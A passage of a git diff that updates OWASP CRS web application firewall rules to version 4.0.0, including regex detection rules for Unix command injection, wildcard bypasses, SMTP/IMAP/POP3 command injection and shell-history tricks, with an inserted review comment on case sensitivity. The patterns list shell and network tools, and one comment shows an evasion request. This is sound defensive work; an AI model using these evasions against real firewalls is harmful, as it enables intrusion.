f|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[2-3]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|ar
ch|env|sid)|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:[\s\v&\)<>c\|]|h(?:o(?:[\s\v&\)<>\|]|ami|is)?|iptail[\s\v&\)<>\|])|a(?:ll|tch)[\s\v&\)<>\|]|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))(?:\b|[^0-9A-Z_a-z])" \ + "id:932237,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + 
severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+# [ Unix command injection ]
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932238.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932238 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'
\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\
?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))" \ + "id:932238,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Bypass Rule 930120 (wildcard) ]=- +# +# When Paranoia Level is set to 1 and 2, a Remote Command Execution +# could be exploited bypassing rule 930120 (OS File Access Attempt) +# by using wildcard characters. # # In some other cases, it could be bypassed even if the Paranoia Level is set to 3. 
# Please, keep in mind that this rule could lead to many false positives. # -SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ +# The following two blog posts explain the evasions this rule is designed to detect: +# - https://medium.com/secjuice/waf-evasion-techniques-718026d693d8 +# - https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 + +SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \ "id:932190,\ phase:2,\ block,\ 
@@ -709,16 +1675,149 @@ SecRule ARGS "@rx (?:/|\\\\)(?:[\?\*]+[a-z/\\\\]+|[a-z/\\\\]+[\?\*]+)" \ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ SMTP commands ]=- +# +# This rule prevents execution of SMTP related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932300. +# +# Rule 932301 is a stricter sibling of rule 932300. +# +# Regular expression generated from regex-assembly/932301.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932301 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:DATA|QUIT|HELP(?: .{1,255})?)" \ + "id:932301,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ IMAP4 Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932310. +# +# Rule 932311 is a stricter sibling of rule 932310. 
+# +# Regular expression generated from regex-assembly/932311.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932311 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:C(?:(?:REATE|OPY [\*,0-:]+) [\"-#%-&\*\--9A-Z\x5c_a-z]+|APABILITY|HECK|LOSE)|DELETE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|EX(?:AMINE [\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|PUNGE)|FETCH [\*,0-:]+|L(?:IST [\"-#\*\--9A-Z\x5c_a-z~]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|OG(?:IN [\--\.0-9@_a-z]{1,40} .*?|OUT))|RENAME [\"-#%-&\*\--9A-Z\x5c_a-z]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|S(?:E(?:LECT [\"-#%-&\*\--9A-Z\x5c_a-z]+|ARCH(?: CHARSET [\--\.0-9A-Z_a-z]{1,40})? (?:(KEYWORD \x5c)?(?:A(?:LL|NSWERED)|BCC|D(?:ELETED|RAFT)|(?:FLAGGE|OL)D|RECENT|SEEN|UN(?:(?:ANSWER|FLAGG)ED|D(?:ELETED|RAFT)|SEEN)|NEW)|(?:BODY|CC|FROM|HEADER .{1,100}|NOT|OR .{1,255}|T(?:EXT|O)) .{1,255}|LARGER [0-9]{1,20}|[\*,0-:]+|(?:BEFORE|ON|S(?:ENT(?:(?:BEFOR|SINC)E|ON)|INCE)) \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4}\"?|S(?:MALLER [0-9]{1,20}|UBJECT .{1,255})|U(?:ID [\*,0-:]+?|NKEYWORD \x5c(Seen|(?:Answer|Flagg)ed|D(?:eleted|raft)|Recent))))|T(?:ORE [\*,0-:]+? [\+\-]?FLAGS(?:\.SILENT)? 
(?:\(\x5c[a-z]{1,20}\))?|ARTTLS)|UBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+)|UN(?:SUBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+|AUTHENTICATE)|NOOP)" \ + "id:932311,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932320. +# +# Rule 932321 is a stricter sibling of rule 932320. +# +# Regular expression generated from regex-assembly/932321.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932321 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?:QUI|STA|RSE)(?i:T)|NOOP|CAPA)" \ + "id:932321,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# =[ Unix shell history invocation ]= +# +# This rule is a stricter sibling of 932330. +# Shell history can also be invoked by providing an absolute position: '!1' or by repeating the last command '!!'. +# The latter might seem harmless as you would expect that it already requires a successful exploitation, but it is a threat in disguise. +# +# Imagine the following requests: +# GET /?rce=c +# GET /?rce=!!!! +# The last request will invoke /usr/bin/cc, which is otherwise blocked by 932150. +# +# Neither !1 nor !! is necessarily valid speech, but blocking either of them is much more likely to cause false-positives than 932330. 
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d|!)" \ + "id:932331,\ + phase:2,\ + block,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf index d6edd63c57..66bd9eabb1 100644 --- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf +++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf 
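Review bot: The new 932301 pattern `\r\n(?s:.)*?\b(?:DATA|QUIT|HELP(?: .{1,255})?)` matches the SMTP verbs case-sensitively, which is inconsistent with the two siblings added in the same hunk: 932311 carries `(?is)` and 932321 uses `(?i:T)`. SMTP command verbs are case-insensitive by specification (RFC 5321 §2.4), so only the upper-case spelling contributes to the PL3 score here. Whether this mirrors the base rule 932300 I cannot tell, since 932300 is outside this hunk; if it is not deliberate, the case-insensitive flag should be set in regex-assembly/932301.ra and the expression regenerated with `crs-toolchain regex update 932301`, and the header comment should say which case behaviour is intended.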
@@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,18 +14,18 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ PHP Injection Attacks ]=- # # [ References ] -# http://rips-scanner.sourceforge.net/ -# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# https://rips-scanner.sourceforge.net/ +# https://wiki.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh # # 
@@ -43,12 +44,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAf # Therefore, that pattern is now checked by rule 933190 in paranoia levels # 3 or higher. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:/|\x5c)?php\])" \ "id:933100,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'PHP Injection Attack: PHP Open Tag Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -58,11 +59,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Script Uploads ] @@ -71,7 +71,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # (.php, .phps, .phtml, .php5 etc). # # Many application contain Unrestricted File Upload vulnerabilities. -# https://www.owasp.org/index.php/Unrestricted_File_Upload +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload # # Attackers may use such a vulnerability to achieve remote code execution # by uploading a .php file. If the upload storage location is predictable 
